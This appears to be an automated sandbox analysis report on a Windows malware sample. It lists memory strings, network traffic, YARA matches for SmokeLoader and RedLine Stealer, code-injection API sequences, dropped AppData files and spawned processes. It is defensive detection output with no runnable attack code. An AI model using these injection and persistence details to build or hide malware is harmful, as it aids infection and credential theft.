Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1733753892.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443

Source: unknown	HTTPS traffic detected: 23.145.40.181:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.181:443 -> 192.168.2.4:49875 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 7.3.7E95.exe.890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.7E95.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.7E95.exe.880e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401546 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401546
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00403135 RtlCreateUserThread,NtTerminateProcess,	0_2_00403135
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401545 NtAllocateVirtualMemory,	0_2_00401545
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401551 NtAllocateVirtualMemory,	0_2_00401551
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401652 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401652
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_0040165E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040165E
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401563 NtAllocateVirtualMemory,	0_2_00401563
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_0040166A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040166A
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_0040227B NtQuerySystemInformation,NtQuerySystemInformation,	0_2_0040227B
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_0040327E RtlCreateUserThread,NtTerminateProcess,	0_2_0040327E
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401617 NtAllocateVirtualMemory,	0_2_00401617
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401582 NtAllocateVirtualMemory,	0_2_00401582
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_0040158C NtAllocateVirtualMemory,	0_2_0040158C
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401590 NtAllocateVirtualMemory,	0_2_00401590
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_00401691 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401691
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_004025B8 NtEnumerateKey,NtEnumerateKey,NtClose,	0_2_004025B8
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401546 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401546
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00403135 RtlCreateUserThread,NtTerminateProcess,	5_2_00403135
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401545 NtAllocateVirtualMemory,	5_2_00401545
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401551 NtAllocateVirtualMemory,	5_2_00401551
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401652 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401652
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_0040165E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_0040165E
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401563 NtAllocateVirtualMemory,	5_2_00401563
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_0040166A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_0040166A
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_0040227B NtQuerySystemInformation,NtQuerySystemInformation,	5_2_0040227B
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_0040327E RtlCreateUserThread,NtTerminateProcess,	5_2_0040327E
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401617 NtAllocateVirtualMemory,	5_2_00401617
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401582 NtAllocateVirtualMemory,	5_2_00401582
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_0040158C NtAllocateVirtualMemory,	5_2_0040158C
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401590 NtAllocateVirtualMemory,	5_2_00401590
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_00401691 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401691
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_004025B8 NtEnumerateKey,NtEnumerateKey,NtClose,	5_2_004025B8
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00402F78 RtlCreateUserThread,NtTerminateProcess,	7_2_00402F78
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_0040151A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_0040151A
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401543
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00401547 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401547
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_0040154A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_0040154A
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401558
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00403306 GetModuleHandleA,CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQuerySystemInformation,NtQueryInformationProcess,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,wcsstr,tolower,towlower,	7_2_00403306
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00401707 NtMapViewOfSection,	7_2_00401707
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00401525 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401525
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00403127 RtlCreateUserThread,NtTerminateProcess,	7_2_00403127
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00401539 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_00401539
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00402FD6 RtlCreateUserThread,NtTerminateProcess,	7_2_00402FD6
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_004014DC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004014DC

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_004025B8	0_2_004025B8
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Code function: 0_2_0041C110	0_2_0041C110
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_004025B8	5_2_004025B8
Source: C:\Users\user\AppData\Roaming\vdhivcv	Code function: 5_2_0041C110	5_2_0041C110
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_00403306	7_2_00403306
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Code function: 7_2_0041D240	7_2_0041D240
Source: C:\Users\user\AppData\Roaming\wrhivcv	Code function: 8_2_0041D240	8_2_0041D240
Source: C:\Users\user\AppData\Roaming\wrhivcv	Code function: 8_2_0040217E	8_2_0040217E

Source: F8FA.exe.1.dr

Static PE information: Data appended to the last section found

Source: 3WaqgS34S7.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/5@9/5

Source: C:\Users\user\Desktop\3WaqgS34S7.exe

Code function: 0_2_009F0939 CreateToolhelp32Snapshot,Module32First,

0_2_009F0939

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vdhivcv

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\F8FA.tmp

Jump to behavior

Source: 3WaqgS34S7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3WaqgS34S7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 3WaqgS34S7.exe	ReversingLabs: Detection: 63%
Source: 3WaqgS34S7.exe	Virustotal: Detection: 51%

Source: unknown	Process created: C:\Users\user\Desktop\3WaqgS34S7.exe "C:\Users\user\Desktop\3WaqgS34S7.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vdhivcv C:\Users\user\AppData\Roaming\vdhivcv
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7E95.exe C:\Users\user\AppData\Local\Temp\7E95.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wrhivcv C:\Users\user\AppData\Roaming\wrhivcv
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\7E95.exe C:\Users\user\AppData\Local\Temp\7E95.exe	Jump to behavior

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vdhivcv	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wrhivcv	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\3WaqgS34S7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\3WaqgS34S7.exe	Unpacked PE file: 0.2.3WaqgS34S7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.voheba:W;.yovu:W;.lobudib:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\vdhivcv	Unpacked PE file: 5.2.vdhivcv.400000.0.unpack .text:ER;.rdata:R;.data:W;.voheba:W;.yovu:W;.lobudib:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Unpacked PE file: 7.2.7E95.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.kona:W;.yip:W;.xijewek:R;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Roaming\wrhivcv

